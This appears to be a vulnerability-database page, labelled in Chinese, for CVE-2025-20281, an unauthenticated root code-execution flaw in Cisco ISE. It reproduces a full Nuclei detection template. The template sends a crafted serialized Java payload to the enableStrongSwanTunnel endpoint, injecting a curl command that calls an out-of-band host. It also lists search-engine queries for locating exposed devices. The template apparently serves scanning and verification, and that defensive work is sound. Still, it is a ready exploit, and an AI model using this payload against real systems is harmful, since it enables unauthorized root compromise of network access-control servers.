CVE-2025-20281: Cisco ISE - Remote Code Execution

日期: 2025-08-01 | 影响软件: Cisco ISE | POC: 已公开

漏洞描述

A vulnerability in a specific API of Cisco ISE and Cisco ISE-PIC could allow an unauthenticated, remote attacker to execute arbitrary code on the underlying operating system as root. The attacker does not require any valid credentials to exploit this vulnerability. This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by submitting a crafted API request. A successful exploit could allow the attacker to obtain root privileges on an affected device.

PoC代码[已公开]

id: CVE-2025-20281

info:
  name: Cisco ISE - Remote Code Execution
  author: daffainfo
  severity: critical
  description: |
    A vulnerability in a specific API of Cisco ISE and Cisco ISE-PIC could allow an unauthenticated, remote attacker to execute arbitrary code on the underlying operating system as root. The attacker does not require any valid credentials to exploit this vulnerability. This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by submitting a crafted API request. A successful exploit could allow the attacker to obtain root privileges on an affected device.
  impact: |
    Unauthenticated remote attackers can execute arbitrary code as root, leading to full system compromise.
  remediation: |
    Update to the latest available version.
  reference:
    - https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-unauth-rce-ZAd2GnJ6
    - https://www.zerodayinitiative.com/blog/2025/7/24/cve-2025-20281-cisco-ise-api-unauthenticated-remote-code-execution-vulnerability
    - https://nvd.nist.gov/vuln/detail/CVE-2025-20281
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2025-20281
    epss-score: 0.15598
    epss-percentile: 0.94404
    cwe-id: CWE-287
    cpe: cpe:2.3:a:cisco:identity_services_engine:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: cisco
    product: identity_services_engine
    shodan-query: '"Set-Cookie: APPSESSIONID=" "Path=/admin"'
    fofa-query: title="identity services engine"
    google-query: intitle:"identity services engine"
  tags: cve,cve2025,cisco,cisco-ise,rce,kev,vkev,oast,oob,vuln

variables:
  cmd: 'x;curl${IFS}http://{{interactsh-url}}'
  serialized_str: '{{concat(hex_decode("aced0005757200135b4c6a6176612e6c616e672e537472696e673badd256e7e91d7b470200007870000000027400"), hex_decode(dec_to_hex(len(cmd))), cmd, hex_decode("740000"))}}'

http:
  - raw:
      - |
        POST /deployment-rpc/enableStrongSwanTunnel HTTP/1.1
        Host: {{Hostname}}

        {{serialized_str}}

    matchers:
      - type: dsl
        dsl:
          - "contains(interactsh_protocol,'http')"
          - 'status_code == 200'
          - 'len(body)==2'
        condition: and
# digest: 4a0a004730450220117c4b4b5164dfc1aa47cb5cc9bc5634838b7c3507f942b4b7441f30c747200b022100ecc890016dd28576d4de71ebbe541a7249599c86cf3254b13c2ee7dbad823139:922c64590222798bb761d5b6d8e72950

相关漏洞推荐